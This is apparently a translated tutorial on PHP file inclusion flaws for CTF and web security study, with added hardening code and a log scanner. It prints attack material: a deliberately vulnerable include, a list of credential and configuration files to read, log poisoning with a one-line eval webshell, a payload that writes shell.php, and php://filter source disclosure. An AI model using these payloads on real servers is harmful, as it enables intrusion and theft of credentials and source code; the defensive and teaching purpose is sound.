File inclusion vulnerability notes

File inclusion functions

  include: pulls the named file into the current script and executes it (a missing file only raises a warning)

  require: the same, but a missing file is a fatal error

<?php
    echo '<meta http-equiv="Content-Type" content="text/html;charset=gb2312" />';
    // include '1.txt';
    // $a = $_GET['page'];
    $a = "$_GET[page]";   // the page parameter is taken straight from the request
    // echo $a;
    include $a;           // vulnerable: the attacker-controlled value is included as-is
?>

include is called with $a, and $a is whatever the request supplies, so any file can be passed in, including a file that carries a webshell (a "Trojan horse" file). Being able to include an arbitrary file this way is a file inclusion vulnerability.
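A hardened counterpart to the vulnerable include above, added here as an example and not taken from the original post: the requested page name must match a fixed allow-list, the extension is appended by the script rather than by the request, and the resolved path is checked to stay inside the templates directory. The directory $pagesDir and the page names in $allowedPages are assumptions for the example.

```php
<?php
// Added example (not the original post's code): hardened version of
// "include $_GET['page']". Traversal (../), stream wrappers (php://filter)
// and remote URLs (http://) never reach include, because only bare names
// from the allow-list are accepted and the path is built server-side.

$pagesDir     = __DIR__ . '/pages';            // assumption: templates live here
$allowedPages = ['home', 'about', 'contact'];  // assumption: the only valid pages

function resolvePage(string $requested, array $allowed, string $baseDir): ?string
{
    // 1. Only bare names from the allow-list; no slashes, dots or schemes.
    if (!in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. The script chooses the extension, so the request cannot.
    $candidate = $baseDir . '/' . $requested . '.php';
    // 3. Defence in depth: the canonical path must stay inside $baseDir.
    $real     = realpath($candidate);
    $realBase = realpath($baseDir);
    if ($real === false || $realBase === false
        || strncmp($real, $realBase . DIRECTORY_SEPARATOR, strlen($realBase) + 1) !== 0) {
        return null;
    }
    return $real;
}

$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
$path = resolvePage($page, $allowedPages, $pagesDir);
if ($path === null) {
    http_response_code(400);   // reject, and log this: it is an attack indicator
    exit('unknown page');
}
include $path;
```

Requests such as page=../../etc/passwd, page=php://filter/... or page=http://... all fail the allow-list check and are answered with 400 before include runs; the realpath check only matters if the allow-list is later loosened.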

Remote file inclusion

Requires allow_url_include=On in php.ini.

For example: 127.0.0.1/cs/main.php?page=http://www.baidu.com/index.html makes main.php include the page fetched from Baidu.
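The php.ini settings that decide whether remote inclusion works, shown as an added example (not from the original post) with the weak values the technique relies on beside the hardened values. The open_basedir path is an assumption for the example.

```ini
; Added example, not from the original post.

; weak: what the remote inclusion example above requires
; allow_url_fopen   = On
; allow_url_include = On

; hardened: remote URLs are refused by include/require and by fopen()
allow_url_fopen   = Off
allow_url_include = Off
; confine every include and file read to the application tree
; (assumption: the application lives in /var/www/app)
open_basedir      = /var/www/app:/tmp
```

allow_url_include only has effect when allow_url_fopen is also On, so switching either one Off stops http:// inclusion; open_basedir additionally limits which local files (for example /etc/passwd) a local inclusion can reach.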

Commonly targeted sensitive files

On Unix/Linux systems

  /etc/passwd                                          user account data
  /usr/local/app/apache2/conf/httpd.conf               default Apache 2 configuration file
  /usr/local/app/apache2/conf/extra/httpd-vhosts.conf  virtual host settings
  /usr/local/app/php5/lib/php.ini                      PHP settings
  /etc/httpd/conf/httpd.conf                           Apache configuration file
  /etc/my.cnf                                          MySQL configuration file

On Windows systems

  C:\boot.ini                                          shows the system version
  C:\windows\system32\inetsrv\MetaBase.xml             IIS configuration file
  C:\windows\repair\sam                                password database from the initial Windows installation
  C:\Program Files\mysql\my.ini                        MySQL configuration
  C:\Program Files\mysql\data\mysql\user.MYD           MySQL user table, including the root account
  C:\windows\php.ini                                   PHP configuration
  C:\windows\my.ini                                    MySQL configuration file

Common sensitive files in CTF challenges: the flag

  1. The flag file is in the root directory: C://flag.txt
  2. The flag is placed in the passwd file: /etc/passwd
  3. The flag file is in the web root directory
  4. The flag file is in the directory of the current page
  5. The flag file is next to the apache/php/mysql configuration files; use phpinfo() to find the path
Getting a shell by including the log file

  Request http://127.0.0.1/<?php eval($_POST[111])?> . A browser would URL-encode the payload, so the request is sent from Burp Suite instead, so that the PHP tag reaches the log unencoded.

The one-sentence webshell is then recorded in the server's log file. As long as allow_url_include=On is satisfied, the log file can be passed, locally or remotely, as the parameter of the file inclusion vulnerability; PHP then parses the implanted one-sentence webshell and we get a shell (the absolute path of the log file must be known).

Writing a shell through remote file inclusion

<?php
    // writes a one-sentence webshell into shell.php in the current directory
    fputs(fopen('shell.php', 'w'), '<?php eval($_POST[1]);?>');
?>

The fopen() function opens (or creates) a file named shell.php, and fputs() writes the webshell into it.

When a file containing this code is passed as the parameter of the vulnerable include, it is executed, and a one-sentence webshell file named shell.php is created in the current directory.

Reading files through PHP stream wrappers

  http://10.1.2.5:17857/cs/main.php?page=php://filter/read=convert.base64-encode/resource=main.php

  The php://filter wrapper returns main.php base64-encoded instead of executing it; decoding the base64 recovers the file's source code.
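Every technique on this page (traversal to /etc/passwd, php://filter source disclosure, http:// remote inclusion, and log poisoning with a PHP tag in the request line) leaves a recognisable trace in the web server's access log. The scanner below is an added example, not part of the original post, that classifies access-log lines by those indicators; the five log lines and the regular expressions are constructed for the example and would need tuning for a real site.

```php
<?php
// Added example (not from the original post): flag access-log lines that
// carry file-inclusion indicators. Lines are URL-decoded first so that
// %2e%2e%2f and ../ are treated alike.

const LFI_PATTERNS = [
    'traversal'      => '#(\.\./|\.\.\\\\)#',
    'php_wrapper'    => '#(php://(filter|input)|data:|expect://)#i',
    'remote_include' => '#[?&]page=(https?|ftp):#i',
    'log_poison'     => '#<\?php#i',
    'sensitive_file' => '#(/etc/passwd|httpd\.conf|php\.ini|boot\.ini|my\.cnf)#i',
];

// Returns the names of every indicator matched by one log line.
function classifyLogLine(string $line): array
{
    $decoded = urldecode($line);
    $hits = [];
    foreach (LFI_PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Returns one finding per suspicious line: line number, indicators, raw text.
function scanLog(array $lines): array
{
    $findings = [];
    foreach ($lines as $n => $line) {
        $hits = classifyLogLine($line);
        if ($hits !== []) {
            $findings[] = ['line' => $n + 1, 'indicators' => $hits, 'raw' => $line];
        }
    }
    return $findings;
}

// Constructed sample lines in Apache combined format (not a real log).
$sampleLog = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cs/main.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /cs/main.php?page=../../../../etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /cs/main.php?page=php://filter/read=convert.base64-encode/resource=main.php HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /<?php eval($_POST[111])?> HTTP/1.1" 404 200',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /cs/main.php?page=http://attacker.example/x.txt HTTP/1.1" 200 300',
];

foreach (scanLog($sampleLog) as $f) {
    printf("line %d: %s\n", $f['line'], implode(',', $f['indicators']));
}
```

Line 1 produces no finding; line 2 matches traversal and sensitive_file, line 3 php_wrapper, line 4 log_poison, and line 5 remote_include. A 200 status on a line matching php_wrapper or remote_include means the inclusion most likely succeeded and the served content, not just the request, should be reviewed; a log_poison hit on a 404 is still worth alerting on, because the payload is now stored in the log regardless of the response code.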

Origin http://43.154.161.224:23101/article/api/json?id=324875784&siteId=291194637